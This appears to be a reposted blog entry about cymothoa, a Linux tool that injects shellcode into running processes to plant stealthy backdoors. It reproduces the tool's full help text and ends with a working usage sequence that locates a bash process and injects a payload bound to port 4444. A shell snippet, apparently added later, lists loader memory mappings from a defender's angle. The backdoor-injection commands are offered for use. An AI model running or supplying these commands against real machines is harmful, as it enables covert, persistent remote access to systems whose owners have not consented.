Ver.1 (beta) - Runtime shellcode injection, for stealthy backdoors...

By codwizard (codwizard@gmail.com) and crossbower (crossbower@gmail.com)
from ES-Malaria by ElectronicSouls (http://www.0x4553.org).

Usage:
        cymothoa -p <pid> -s <shellcode_number> [options]

Main options:
        -p      process pid
        -s      shellcode number
        -l      memory region name for shellcode injection (default /lib/ld)
                search for "r-xp" permissions, see /proc/pid/maps...
        -m      memory region name for persistent memory (default /lib/ld)
                search for "rw-p" permissions, see /proc/pid/maps...
        -h      print this help screen
        -S      list available shellcodes

Injection options (overwrite payload flags):
        -f      fork parent process
        -F      don't fork parent process
        -b      create payload thread (probably you need also -F)
        -B      don't create payload thread
        -w      pass persistent memory address
        -W      don't pass persistent memory address
        -a      use alarm scheduler
        -A      don't use alarm scheduler
        -t      use setitimer scheduler
        -T      don't use setitimer scheduler

Payload arguments:
        -j      set timer (seconds)
        -k      set timer (microseconds)
        -x      set the IP
        -y      set the port number
        -r      set the port number 2
        -z      set the username (4 bytes)
        -o      set the password (8 bytes)
        -c      set the script code (ex: "#!/bin/sh\nls; exit 0")
                escape codes will not be interpreted...
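The -l and -m options in the help output above pick mappings from /proc/pid/maps by region name and permission string. The shell functions below are an added example, not part of the original post or of cymothoa: they list the mappings in a process that match those defaults, which are the regions a defender would baseline or inspect. The sample maps lines are constructed, and matching the name as a substring of the path is an assumption of this example.

```shell
#!/bin/sh
# Constructed sample of /proc/<pid>/maps content (not captured from a real process).
sample_maps() {
cat <<'EOF'
08048000-08124000 r-xp 00000000 08:01 131 /bin/bash
08124000-08129000 rw-p 000db000 08:01 131 /bin/bash
b7e5a000-b7e75000 r-xp 00000000 08:01 402 /lib/ld-2.11.1.so
b7e75000-b7e76000 r--p 0001a000 08:01 402 /lib/ld-2.11.1.so
b7e76000-b7e77000 rw-p 0001b000 08:01 402 /lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
EOF
}

# match_regions NAME PERMS
# Reads maps lines on stdin and prints "range perms path" for every mapping
# whose permission field equals PERMS and whose path contains NAME.
# Fields: address-range perms offset dev inode pathname.
# Assumption: NAME is matched as a substring of the path (first token only,
# so paths containing spaces are compared up to the first space).
match_regions() {
    awk -v name="$1" -v perms="$2" '
        $2 == perms && index($6, name) > 0 { print $1, $2, $6 }
    '
}

# report PID
# Lists, for a live process, the mappings that match the defaults shown in
# the help text: /lib/ld with r-xp (code) and /lib/ld with rw-p (data).
report() {
    maps="/proc/$1/maps"
    [ -r "$maps" ] || { echo "cannot read $maps" >&2; return 1; }
    echo "r-xp mappings matching /lib/ld:"
    match_regions /lib/ld r-xp < "$maps"
    echo "rw-p mappings matching /lib/ld:"
    match_regions /lib/ld rw-p < "$maps"
}
```

Run `report <pid>` as a user allowed to read that process's maps file; on systems where the loader lives under a different path, pass that path to `match_regions` instead of /lib/ld.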
===========================================================================================
tar -cf cymothoa.tar cymothoa/
tar xf cymothoa.tar
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ps a|grep /bin/bash
./cymothoa -s 0 -p 2211 -y 4444
Original: https://www.cnblogs.com/-qing-/p/10519363.html